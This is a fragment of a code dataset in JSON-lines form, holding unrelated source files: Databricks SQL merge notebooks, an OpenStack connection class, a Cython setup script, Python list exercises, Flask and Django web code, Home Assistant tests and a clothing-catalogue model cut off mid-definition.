----------\n\ndf.createOrReplaceTempView(\"hash_family\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC -- Create Global temp view in global_temp database for delta changes \n# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW dimmaterialfamily\n# MAGIC AS\n# MAGIC SELECT DesignNumber, MaterialFamily\n# MAGIC , EDW_CRT_TS, EDW_UPDT_TS, EDW_ACTV_FLG, EDW_HASH_CHK \n# MAGIC from hash_family\n# MAGIC ;\n\n# COMMAND ----------\n\n# Call reusable notebook to write to Azure data warehouse LND area \n# schemaNm = ADW landing schema \n# tableNm = ADW table name \n# dbrxTable = global temp table name\ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write\", 3600, {\"schemaNm\": \"CSC_LND\", \"tableNm\": \"DimMaterialFamily\", \"dbrxTable\": \"dimmaterialfamily\", \"writeMode\": \"overwrite\"})\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC MERGE INTO CSC.DimMaterialFamily a\n# MAGIC USING global_temp.dimmaterialfamily b\n# MAGIC ON a.DesignNumber = b.DesignNumber\n# MAGIC \n# MAGIC WHEN MATCHED THEN UPDATE \n# MAGIC SET a.MaterialFamily = b.MaterialFamily\n# MAGIC , a.EDW_UPDT_TS = current_timestamp\n# MAGIC , a.EDW_ACTV_FLG = b.EDW_ACTV_FLG\n# MAGIC , a.EDW_HASH_CHK = b.EDW_HASH_CHK\n# MAGIC \n# MAGIC WHEN NOT MATCHED THEN INSERT\n# MAGIC ( DesignNumber\n# MAGIC , MaterialFamily\n# MAGIC , EDW_CRT_TS\n# MAGIC , EDW_UPDT_TS\n# MAGIC , EDW_ACTV_FLG\n# MAGIC , EDW_HASH_CHK\n# MAGIC )\n# MAGIC VALUES\n# MAGIC ( b.DesignNumber\n# MAGIC , b.MaterialFamily\n# MAGIC , current_timestamp\n# MAGIC , current_timestamp\n# MAGIC , b.EDW_ACTV_FLG\n# MAGIC , b.EDW_HASH_CHK);\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC --Drop the global temp view once the data has been sent to ADW.\n# MAGIC DROP VIEW IF EXISTS global_temp.dimmaterialfamily;\n","sub_path":"Dev/csc/dimmaterialfamily.py","file_name":"dimmaterialfamily.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"592536769","text":"# Copyright (c) 2016 OpenStack Foundation.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom ovs.db import idl\n\nfrom ovsdbapp.backend.ovs_idl import connection as conn\n\n\ndef get_schema_helper_for_vtep():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n return idl.SchemaHelper(current_dir + '/../vtep/vtep.ovsschema')\n\n\nclass Connection(conn.Connection):\n def __init__(self, connection, timeout, schema_name):\n idl_ = idl.Idl(connection, get_schema_helper_for_vtep())\n super(Connection, self).__init__(idl_, timeout)\n","sub_path":"networking_l2gw/services/l2gateway/agent/ovsdb/native/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"31717157","text":"\n\nimport logging\nfrom setuptools import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\nimport numpy\n\n\nextensions = [\n Extension(\"NPTFit.npll\", [\"NPTFit/npll.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.pll\", [\"NPTFit/pll.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.incgamma_fct_p\", [\"NPTFit/incgamma_fct_p.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.x_m\", [\"NPTFit/x_m.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.incgamma_fct\", [\"NPTFit/incgamma_fct.pyx\"],\n include_dirs=[numpy.get_include()], libraries=[\"gsl\", \"gslcblas\", \"m\"],\n extra_compile_args=[\"-ffast-math\",'-O3'])\n]\n\nsetup_args = {'name':'NPTFit',\n 'version':'0.2',\n 'description':'A Python package for Non-Poissonian Template Fitting',\n 'url':'https://github.com/bsafdi/NPTFit',\n 'author':'Siddharth Mishra-Sharma',\n 'author_email':'smsharma@princeton.edu',\n 'license':'MIT',\n 'install_requires':[\n 'numpy',\n 'matplotlib',\n 'healpy',\n 'Cython',\n 'pymultinest',\n 'jupyter',\n 'corner',\n 'mpmath',\n ]}\n \n# Attempt GSL compilation; if this fails, do standard compilation.\n\ntry:\n print(\"Attempting GSL compilation...\")\n setup(packages=['NPTFit'],\n ext_modules = cythonize(extensions),\n **setup_args\n )\n print(\"GSL compilation successful!\")\n\nexcept:\n print(\"GSL compilation failed! Attempting mpmath compilation...\")\n setup(packages=['NPTFit'],\n ext_modules = cythonize(extensions[:-1]),\n **setup_args\n )\n print(\"mpmath compilation successful!\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"457891100","text":"import sys\n\n# 1. Write a Python program to sum all the items in a list.\ndef sumList():\n list = [1,2,3,4,5]\n print(list)\n x = 0\n for n in list:\n x += n\n print(\"Sum of list: \" + str(x))\n xy = sum(list)\n print(\"Or use sum(list) : \" + str(xy))\n\n# 2.Write a Python program that multiplies all the items in a list.\ndef mulitpyList():\n list = [1,2,3,4,5]\n print(\"List: \" + str(list))\n x = 1\n for n in list:\n x *= n\n print(\"Product of list: {}\".format(x))\n\n# 3.Write a Python program to get the largest number from a list.\ndef maxInList():\n list = [1,7,3,4,5]\n print(\"List: \" + str(list))\n largest = 0\n for n in list:\n if n > largest:\n largest = n\n print(\"Largest element in list is: {}\".format(largest))\n # or use max() function\n print(\"Using max() function: {}\".format(max(list)))\n\n# 4. Write a Python program to get the smallest number from a list.\ndef minInList():\n list = [16,7,3,4,5]\n print(\"List: \" + str(list))\n smallest = sys.maxsize\n for n in list:\n if n < smallest:\n smallest = n\n print(\"Min element of list is: {}\".format(smallest))\n # or use min() function\n print(\"Using min function(): {}\".format(min(list)))\n\n# 5. Write a Python program to count the number of strings where the string length is 2 or\n# more and the first and last character are same from a given list of strings\n\"\"\"\nSample List : ['abc', 'xyz', 'aba', '1221']\nExpected Result : 2\n\"\"\"\ndef countStrings():\n list = ['abc', 'xyz', 'aba', '1221']\n list2 = [0] * len(list)\n counter = 0\n for n in list:\n if len(n) > 2:\n if n[0] == n[-1]:\n list2[counter] = n\n counter += 1\n x = 4 - counter\n for n in range(x):\n list2.pop()\n print(\"Strings: {}\".format(list2))\n print(\"Result: \" + str(counter))\n\n# 6. Write a Python program to get a list, sorted in increasing order by the last element in each tuple from a\n# given list of non-empty tuples.\n\"\"\"\nSample List : [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\nExpected Result : [(2, 1), (1, 2), (2, 3), (4, 4), (2, 5)]\n\"\"\"\ndef getLast(tuple):\n return tuple[-1]\n\ndef sortByLastTuple():\n sample = [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\n sortedSample = sorted(sample, key=getLast)\n print(sortedSample)\n\n# 7. Write a Python program to remove duplicates from a list.\ndef removeDuplicates():\n sample = [1,13,2,15,1,16,7,7]\n print(\"Sample list: \" + str(sample))\n x = set(sample)\n print(\"Set made of sample list: \" + str(x))\n for n in x:\n if sample.count(n) > 1:\n for m in range(2):\n sample.remove(n)\n print(\"List after removing duplicates: \" + str(sample))\n\n# 8. Write a Python program to check a list is empty or not.\ndef checkEmpty():\n list = []\n list2 = [1,2]\n checkList = list2\n if len(checkList) != 0:\n print(\"List is not empty!\")\n else:\n print(\"List is empty\")\n\n# 9. Write a Python program to clone or copy a list.\ndef cloneList():\n sample = [1,13,2,15,1,16,7,7]\n new_list = []\n for n in sample:\n new_list.append(n)\n print(\"For loop: {}\".format(new_list))\n #or\n list_clone =sample.copy()\n print(\".copy() : {}\".format(list_clone))\n\n# 10. Write a Python program to find the list of words that are longer than n from a given list of words.\n\n# 11.Write a Python function that takes two lists and returns True if they have at least one common member.\ndef commonMember():\n sample1 = [1,2,3,4,5]\n sample2 = [1,12,13,1,5]\n counter = 0\n for n in sample1:\n for m in sample2:\n if n == m:\n print(\"m: {0}, n:{1}\".format(m,n))\n print(\"True\")\n\n# 12. Write a Python program to print a specified list after removing the 0th, 4th and 5th elements.\n\"\"\"\nSample List : ['Red', 'Green', 'White', 'Black', 'Pink', 'Yellow']\nExpected Output : ['Green', 'White', 'Black']\n\"\"\"\ndef remove045():\n sample = ['Red', 'Green', 'White', 'Black', 'Pink', 'Yellow']\n print(\"List: {}\".format(sample))\n sample.pop(0)\n sample.pop(3)\n sample.pop(3)\n print(\"List after removing elements: {}\".format(sample))\n\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454781582","text":"#%%\nimport numpy as np\nimport pandas as pd\n\n# Load the complete gene-linked dataset\ndata = pd.read_csv('../../data/uniprot_biological_processes.csv')\n\n# %%\n# Instantiate an empty list to keep track of what classes have already been\n# linked\nconnected_pairs = []\n\n# Instantiate an empty dataframe of connections\ndf = pd.DataFrame([], columns=['process_1', 'process_2', 'n_genes'])\n\nfor i, process_i in enumerate(data['process'].unique()):\n for j, process_j in enumerate(data['process'].unique()):\n # If the process is the same, move on\n if process_i == process_j:\n continue\n\n # Find the number of common genes\n n_genes = len(set(data[data['process']==process_i]['gene'].values).intersection(\n data[data['process']==process_j]['gene'].values))\n\n # update the dataframe (keep connections of 0)\n df = df.append({'process_1':process_i, \n 'process_2':process_j,\n 'n_genes':n_genes}, ignore_index=True)\n\n# %%\n# Save the data to disk.\ndf.to_csv('../../data/uniprot_process_gene_network.csv', index=False)\n\n\n# %%\n","sub_path":"code/processing/schmidt_2016_munging/uniprot_process_network_generation.py","file_name":"uniprot_process_network_generation.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"413407107","text":"#-*- coding:utf-8 -*-\n\nfrom flask.ext.restful import (Resource, reqparse, abort, fields, marshal_with,\n marshal)\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom app.movies.models import Movie, Genre, Person\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('limit', type=int)\nparser.add_argument('offset', type=int)\n\n\nclass BaseResource(Resource):\n model = None\n fields = None\n path = ''\n endpoint = ''\n\n def build_query(self):\n if self.model:\n return self.model.query\n else:\n raise ValueError('None is invalid model')\n\n\nclass BaseItemResource(BaseResource):\n def get(self, item_id):\n try:\n instance = self.build_query().filter_by(id=item_id).one()\n except NoResultFound:\n abort(404, message=\"Movie {} doesn't exist\".format(item_id))\n else:\n return marshal(instance, fields=self.fields), 200\n\n\nclass BaseCollectionResource(BaseResource):\n pass\n\n\nclass GenreMixin(object):\n model = Genre\n fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'title_rus': fields.String,\n 'slug': fields.String\n }\n\n\nclass PersonMixin(object):\n model = Person\n fields = {\n 'name': fields.String,\n 'slug': fields.String,\n 'imdb_id': fields.String,\n 'kp_id': fields.String,\n 'poster': fields.String,\n 'person_type': fields.String\n }\n\n\nclass MovieMixin(object):\n model = Movie\n fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'title_rus': fields.String,\n 'slug': fields.String,\n 'imdb_id': fields.String,\n # 'kp_id': fields.String,\n 'imdb_rating': fields.Float,\n # 'kp_rating': fields.Float,\n 'year': fields.String,\n # 'is_series': fields.Boolean,\n 'poster': fields.String,\n 'world_premiere_date': fields.DateTime,\n 'rus_premiere_date': fields.DateTime,\n 'dvd_premiere_date': fields.DateTime,\n 'genres_list': fields.List(fields.Integer),\n 'related_list': fields.List(fields.Integer)\n }\n\n\nclass GenreListResource(GenreMixin, BaseResource):\n path = '/genres'\n endpoint = 'genres_resource'\n\n @marshal_with(GenreMixin.fields)\n def get(self):\n args = parser.parse_args()\n query = self.build_query()\n if args['limit'] and args['offset']:\n query = query.limit(args['limit']).offset(args['offset'])\n return query.all()\n\n\nclass GenreItemResource(GenreMixin, BaseItemResource):\n path = '/genres/'\n endpoint = 'genre_resource'\n\n\nclass MovieListResource(MovieMixin, BaseResource):\n path = '/movies'\n endpoint = 'movies_resource'\n\n def get(self):\n args = parser.parse_args()\n\n params = [\n Movie.is_series == False\n ]\n\n query = self.build_query()\n query = query.filter(*params).order_by(Movie.imdb_rating.desc())\n if args['limit']:\n query = query.limit(args['limit'])\n if args['offset']:\n query = query.offset(args['offset'])\n movies = query.all()\n Movie.load_genres(movies)\n Movie.load_related(movies)\n return marshal(movies, self.fields)\n\n\nclass MovieItemResource(MovieMixin, BaseItemResource):\n path = '/movies/'\n endpoint = 'movie_resource'\n\n\nresources = (\n GenreListResource, GenreItemResource,\n MovieListResource, MovieItemResource\n)\n","sub_path":"app/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419045592","text":"#!/usr/bin/env python3\n# This file is a part of marzer/poxy and is subject to the the terms of the MIT license.\n# Copyright (c) Mark Gillard \n# See https://github.com/marzer/poxy/blob/master/LICENSE for the full license text.\n# SPDX-License-Identifier: MIT\n\nimport sys\nimport re\nimport io\nimport logging\nfrom pathlib import Path\nfrom io import StringIO\nfrom misk import *\n\n\n#=======================================================================================================================\n# FUNCTIONS\n#=======================================================================================================================\n\ndef coerce_path(arg, *args):\n\tassert arg is not None\n\tif args is not None and len(args):\n\t\treturn Path(str(arg), *[str(a) for a in args])\n\telse:\n\t\tif not isinstance(arg, Path):\n\t\t\targ = Path(str(arg))\n\t\treturn arg\n\n\n\ndef coerce_collection(val):\n\tassert val is not None\n\tif not is_collection(val):\n\t\tval = ( val, )\n\treturn val\n\n\n\ndef regex_or(patterns, pattern_prefix = '', pattern_suffix = '', flags=0):\n\tpatterns = [str(r) for r in patterns if r is not None and r]\n\tpatterns.sort()\n\tpattern = ''\n\tif patterns:\n\t\tpattern = '(?:(?:' + ')|(?:'.join(patterns) + '))'\n\tpatterns = re.compile(pattern_prefix + pattern + pattern_suffix, flags=flags)\n\treturn patterns\n\n\n\ndef log(logger, msg, level=logging.INFO):\n\tif logger is None or msg is None:\n\t\treturn\n\tif isinstance(logger, bool):\n\t\tif logger:\n\t\t\tprint(msg, file=sys.stderr if level >= logging.WARNING else sys.stdout)\n\telif isinstance(logger, logging.Logger):\n\t\tlogger.log(level, msg)\n\telif isinstance(logger, io.IOBase):\n\t\tprint(msg, file=logger)\n\telse:\n\t\tlogger(msg)\n\n\n\ndef enum_subdirs(root, filter=None, recursive=False):\n\troot = coerce_path(root)\n\tassert root.is_dir()\n\tsubdirs = []\n\tfor p in root.iterdir():\n\t\tif p.is_dir():\n\t\t\tif filter is not None and not filter(p):\n\t\t\t\tcontinue\n\t\t\tsubdirs.append(p)\n\t\t\tif recursive:\n\t\t\t\tsubdirs = subdirs + enum_subdirs(p, filter=filter, recursive=True)\n\treturn subdirs\n\n\n\ndef combine_dicts(x, y):\n\tz = x.copy()\n\tz.update(y)\n\treturn z\n\n\n\n_is_uri_regex = re.compile(r'^[a-zA-Z][a-zA-Z0-9_]*://.+$')\ndef is_uri(s):\n\tglobal _is_uri_regex\n\treturn _is_uri_regex.fullmatch(str(s)) is not None\n\n\n\n_lib_version = None\ndef lib_version():\n\tglobal _lib_version\n\tif _lib_version is None:\n\t\tdata_dir = Path(Path(__file__).resolve().parent, r'data')\n\t\twith open(Path(data_dir, 'version.txt'), encoding='utf-8') as file:\n\t\t\t_lib_version = [v.strip() for v in file.read().strip().split('.')]\n\t\t\t_lib_version = [v for v in _lib_version if v]\n\t\t\tassert len(_lib_version) == 3\n\t\t\t_lib_version = tuple(_lib_version)\n\treturn _lib_version\n\n\n\n#=======================================================================================================================\n# REGEX REPLACER\n#=======================================================================================================================\n\nclass RegexReplacer(object):\n\n\tdef __substitute(self, m):\n\t\tself.__result = True\n\t\treturn self.__handler(m, self.__out_data)\n\n\tdef __init__(self, regex, handler, value):\n\t\tself.__handler = handler\n\t\tself.__result = False\n\t\tself.__out_data = []\n\t\tself.__value = regex.sub(lambda m: self.__substitute(m), value)\n\n\tdef __str__(self):\n\t\treturn self.__value\n\n\tdef __bool__(self):\n\t\treturn self.__result\n\n\tdef __len__(self):\n\t\treturn len(self.__out_data)\n\n\tdef __getitem__(self, index):\n\t\treturn self.__out_data[index]\n\n\n\n#=======================================================================================================================\n# CppTree\n#=======================================================================================================================\n\nclass CppTree(object):\n\n\tNAMESPACES = 1\n\tTYPES = 2\n\tENUM_VALUES = 4\n\n\tclass Node(object):\n\n\t\tdef __init__(self, val, parent, type_ = 0):\n\t\t\tassert val.find(r'::') == -1\n\t\t\tassert type_ in (0, CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tself.value = val\n\t\t\tself.parent = parent\n\t\t\tself.type = type_\n\t\t\tself.mask = type_\n\t\t\tself.children = {}\n\n\t\tdef add(self, val, type_ = 0):\n\t\t\tassert val.find(r'::') == -1\n\t\t\tassert type_ in (0, CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tchild = None\n\t\t\tif val not in self.children:\n\t\t\t\tchild = CppTree.Node(val, self, type_)\n\t\t\t\tself.children[val] = child\n\t\t\telse:\n\t\t\t\tchild = self.children[val]\n\t\t\t\tif type_:\n\t\t\t\t\tassert child.type in (0, type_)\n\t\t\t\t\tchild.type = type_\n\t\t\t\t\tchild.mask = child.mask | type_\n\t\t\tself.mask = self.mask | child.mask\n\t\t\treturn child\n\n\t\tdef regex_matcher(self, type_):\n\t\t\tassert type_ in (CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tif not (type_ & self.mask):\n\t\t\t\treturn None\n\t\t\tif not self.children:\n\t\t\t\treturn self.value\n\t\t\tmatchers = [v.regex_matcher(type_) for k, v in self.children.items()]\n\t\t\tmatchers = [v for v in matchers if v is not None]\n\t\t\tif not matchers:\n\t\t\t\tif self.type == type_:\n\t\t\t\t\treturn self.value\n\t\t\t\treturn None\n\n\t\t\tgrouped = len(matchers) > 1\n\t\t\tmatchers = r'|'.join(matchers)\n\t\t\tif not self.value and not self.parent: # root\n\t\t\t\treturn matchers\n\t\t\tmatchers = (r'(?:' if grouped else '') + matchers + (r')' if grouped else '')\n\n\t\t\tif self.type == type_:\n\t\t\t\treturn rf'{self.value}(?:::{matchers})?'\n\t\t\telse:\n\t\t\t\treturn rf'{self.value}::{matchers}'\n\n\n\n\tdef __init__(self):\n\t\tself.root = CppTree.Node('', None)\n\n\tdef add(self, val, type_):\n\t\tassert type_ in (CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\tval = [v for v in val.split(r'::') if len(v)]\n\t\tparent = self.root\n\t\twhile len(val):\n\t\t\tv = val.pop(0)\n\t\t\tparent = parent.add(v, type_ if not len(val) else 0)\n\n\tdef add_type(self, val):\n\t\tself.add(val, CppTree.TYPES)\n\n\tdef add_namespace(self, val):\n\t\tself.add(val, CppTree.NAMESPACES)\n\n\tdef add_enum_value(self, val):\n\t\tself.add(val, CppTree.ENUM_VALUES)\n\n\tdef matcher(self, type_):\n\t\treturn self.root.regex_matcher(type_)\n\n\n\n#=======================================================================================================================\n# Custom exceptions\n#=======================================================================================================================\n\nclass Error(Exception):\n\t\"\"\"Base class for other exceptions.\"\"\"\n\n\tdef __init__(self, *message):\n\t\tself.__message = r' '.join([str(m) for m in message])\n\t\tsuper().__init__(*message)\n\n\tdef __str__(self):\n\t\treturn self.__message\n\n\n\nclass WarningTreatedAsError(Error):\n\t\"\"\"Raised when a warning is generated and the user has chosen to treat warnings as errors.\"\"\"\n\tpass\n","sub_path":"poxy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"273383380","text":"\"\"\"Test init of AccuWeather integration.\"\"\"\nfrom homeassistant.components.accuweather.const import DOMAIN\nfrom homeassistant.config_entries import (\n ENTRY_STATE_LOADED,\n ENTRY_STATE_NOT_LOADED,\n ENTRY_STATE_SETUP_RETRY,\n)\nfrom homeassistant.const import STATE_UNAVAILABLE\n\nfrom tests.async_mock import patch\nfrom tests.common import MockConfigEntry\nfrom tests.components.accuweather import init_integration\n\n\nasync def test_async_setup_entry(hass):\n \"\"\"Test a successful setup entry.\"\"\"\n await init_integration(hass)\n\n state = hass.states.get(\"weather.home\")\n assert state is not None\n assert state.state != STATE_UNAVAILABLE\n assert state.state == \"sunny\"\n\n\nasync def test_config_not_ready(hass):\n \"\"\"Test for setup failure if connection to AccuWeather is missing.\"\"\"\n entry = MockConfigEntry(\n domain=DOMAIN,\n title=\"Home\",\n unique_id=\"0123456\",\n data={\n \"api_key\": \"32-character-string-1234567890qw\",\n \"latitude\": 55.55,\n \"longitude\": 122.12,\n \"name\": \"Home\",\n },\n )\n\n with patch(\n \"homeassistant.components.accuweather.AccuWeather._async_get_data\",\n side_effect=ConnectionError(),\n ):\n entry.add_to_hass(hass)\n await hass.config_entries.async_setup(entry.entry_id)\n assert entry.state == ENTRY_STATE_SETUP_RETRY\n\n\nasync def test_unload_entry(hass):\n \"\"\"Test successful unload of entry.\"\"\"\n entry = await init_integration(hass)\n\n assert len(hass.config_entries.async_entries(DOMAIN)) == 1\n assert entry.state == ENTRY_STATE_LOADED\n\n assert await hass.config_entries.async_unload(entry.entry_id)\n await hass.async_block_till_done()\n\n assert entry.state == ENTRY_STATE_NOT_LOADED\n assert not hass.data.get(DOMAIN)\n","sub_path":"tests/components/accuweather/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"128565947","text":"#encoding:utf-8\nfrom django.conf.urls.defaults import patterns,url\n\n #creamos nueva rama de urls\n\nurlpatterns = patterns('apps.index.views', #prefijos de la vista que queremos jalar archivo donde estamos jalando las vistas\n\n \n\n\t\t\turl(r'photo.phpfbid=10151498551046840&set=a109041001839/$' , 'index_route' ) , \n\n\t\t\turl(r'login/$' , 'login', name = 'login_view') , \n\n\t\t\turl(r'raw/$' , 'raw', name = 'raw') , \n\n \n\t\t\t) #cerramos la creacion de las ramas\n","sub_path":"apps/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"404912794","text":"from django.db import models\nfrom ad_posts.models import Ad\n\n\nclass Man(Ad):\n TYPE=(\n ('Брелоки и ключницы','Брелоки и ключницы'),\n ('Галстуки и бабочки','Галстуки и бабочки'),\n ('Для волос','Для волос'),\n ('Зонты','Зонты'),\n ('Кошельки','Кошельки'),\n ('Очки','Очки'),\n ('Перчатки и варежки','Перчатки и варежки'),\n ('Ремни и пояса','Ремни и пояса'),\n ('Рюкзаки','Рюкзаки'),\n ('Сумки','Сумки'),\n ('Украшения','Украшения'),\n ('Часы','Часы'),\n ('Чемоданы','Чемоданы'),\n ('Шарфы и платки','Шарфы и платки'),\n )\n BRANDS=(\n ('ACNE STUDIOS','ACNE STUDIOS'),\n ('ADIDAS','ADIDAS'),\n ('Alba','Alba'),\n ('Alexander McQueen','Alexander McQueen'),\n ('Alexander Wang','Alexander Wang'),\n ('Ann Demeulemeester','Ann Demeulemeester'),\n ('Armani','Armani'),\n ('Asos','Asos'),\n ('Avon','Avon'),\n ('Baldinini','Baldinini'),\n ('Balenciaga','Balenciaga'),\n ('Befree','Befree'),\n ('Braccialini','Braccialini'),\n ('Burberry','Burberry'),\n ('Calipso','Calipso'),\n ('Calvin Clein','Calvin Clein'),\n ('Casio','Casio'),\n ('Celine','Celine'),\n ('Chanel','Chanel'),\n ('Chloe','Chloe'),\n ('Chtistian Dior','Chtistian Dior'),\n (\"Colin's\",\"Colin's\"),\n ('Comme des Garcons','Comme des Garcons'),\n ('Cos','Cos'),\n ('Daniel Wellington','Daniel Wellington'),\n ('Dasigual','Dasigual'),\n ('Diesel','Diesel'),\n ('Diva','Diva'),\n ('Dkny','Dkny'),\n ('Dolce&Cabbana','Dolce&Cabbana'),\n ('Dries Van Noten','Dries Van Noten'),\n ('Ecco','Ecco'),\n ('Escada','Escada'),\n ('Etro','Etro'),\n ('Fendi','Fendi'),\n ('Fjallraven','Fjallraven'),\n ('Furla','Furla'),\n ('Geargio Armani','Geargio Armani'),\n ('Givenchy','Givenchy'),\n ('Gucci','Gucci'),\n ('H&M','H&M'),\n ('Helmut Lang','Helmut Lang'),\n ('Incanto','Incanto'),\n ('Insity','Insity'),\n ('Isabel Marant','Isabel Marant'),\n ('Jil Sander','Jil Sander'),\n ('Jimmy Choo','Jimmy Choo'),\n ('Jast Cavalli','Jast Cavalli'),\n ('Karen Millen','Karen Millen'),\n ('Kenzo','Kenzo'),\n ('Lacoste','Lacoste'),\n (\"Livi's\",\"Livi's\"),\n ('Louiss Vuitton','Louiss Vuitton'),\n ('Love Republic','Love Republic'),\n ('Maison Margiela','Maison Margiela'),\n ('Maison Kitsune','Maison Kitsune'),\n ('Mango','Mango'),\n ('Marc Jacobs','Marc Jacobs'),\n ('Marni','Marni'),\n ('Mascotte','Mascotte'),\n ('Max Mara','Max Mara'),\n ('Mexx','Mexx'),\n ('Michael Cors','Michael Cors'),\n ('Missoni','Missoni'),\n ('Miu Miu','Miu Miu'),\n ('Mohito','Mohito'),\n ('Moschino','Moschino'),\n ('Motivi','Motivi'),\n ('Neil Barrett','Neil Barrett'),\n ('New Yorker','New Yorker'),\n ('Next','Next'),\n ('Nike','Nike'),\n (\"O'Stin\",\"O'Stin\"),\n ('Off-White','Off-White'),\n ('Officine Creative','Officine Creative'),\n ('Oysho','Oysho'),\n ('Pinco','Pinco'),\n ('Piquadro','Piquadro'),\n ('Prada','Prada'),\n ('Pull&Bear','Pull&Bear'),\n ('RAFF SIMONS','RAFF SIMONS'),\n ('Ralph Lauren','Ralph Lauren'),\n ('Ray-Ban','Ray-Ban'),\n ('Reebok','Reebok'),\n ('Reserved','Reserved'),\n ('Rick Owens','Rick Owens'),\n ('River Island','River Island'),\n ('Roxy','Roxy'),\n ('Salvatore Ferragamo','Salvatore Ferragamo'),\n ('Sisley','Sisley'),\n ('Skagen','Skagen'),\n ('Stella Mccartney','Stella Mccartney'),\n ('Stradivarius','Stradivarius'),\n ('Sunlight','Sunlight'),\n ('Swarovski','Swarovski'),\n ('Ted Baker','Ted Baker'),\n ('Terranova','Terranova'),\n ('Tods','Tods'),\n ('Tommy Hilfiger','Tommy Hilfiger'),\n ('Topshop','Topshop'),\n ('Toska Blu','Toska Blu'),\n ('Tous','Tous'),\n ('Undercover','Undercover'),\n ('United Colors of Beneton','United Colors of Beneton'),\n ('Valentino','Valentino'),\n ('Vans','Vans'),\n ('Versace','Versace'),\n (\"Victoria's Secret\",\"Victoria's Secret\"),\n ('Vivienne WestWood','Vivienne WestWood'),\n ('YSL','YSL'),\n ('Yohji Yamamoto','Yohji Yamamoto'),\n ('Yves Saint Laurent','Yves Saint Laurent'),\n ('Zara','Zara'),\n ('Zarina','Zarina'),\n ('Дикая Орхидея','Дикая Орхидея'),\n ('Новая Заря','Новая Заря'),\n ('Эконика','Эконика'),\n )\n COLOR=(\n ('Белый','Белый'),\n ('Хаки','Хаки'),\n ('Серый','Серый'),\n ('Чёрный','Чёрный'),\n ('Коричневый','Коричневый'),\n ('Бордовый','Бордовый'),\n ('Бежевый','Бежевый'),\n ('Красный','Красный'),\n ('Оранжевый','Оранжевый'),\n ('Жёлтый','Жёлтый'),\n ('Зелёный','Зелёный'),\n ('Голубой','Голубой'),\n ('Синий','Синий'),\n ('Фиолетовый','Фиолетовый'),\n ('Пурпурный','Пурпурный'),\n ('Розовый','Розовый'),\n ('Разноцветный','Разноцветный'),\n )\n CONDITION =(\n ('Б/У','Б/У'),\n ('Новое','Новое'),\n )\n SIZE=(\n ('44-46 (S)','44-46 (S)'),\n ('46-48 (M)','46-48 (M)'),\n ('48-50 (L)','48-50 (L)'),\n ('50-52 (XL)','50-52 (XL)'),\n ('52-54 (XXL)','52-54 (XXL)'),\n ('54-56 (XXXL)','54-56 (XXXL)'),\n )\n SEASON =(\n ('Демисезон','Демисезон'),\n ('Зима','Зима'),\n ('Лето','Лето'),\n )\n OUTERWEAR=(\n ('Ветровки','Ветровки'),\n ('Джинсовые куртки','Джинсовые куртки'),\n ('Дождевики','Дождевики'),\n ('Дубленки','Дубленки'),\n ('Жилеты','Жилеты'),\n ('Кожаные куртки','Кожаные куртки'),\n ('Куртки','Куртки'),\n ('Пальто','Пальто'),\n ('Парки','Парки'),\n ('Плащи и тренчи','Плащи и тренчи'),\n ('Пуховики','Пуховики'),\n )\n HAT=(\n ('Бейсболки и 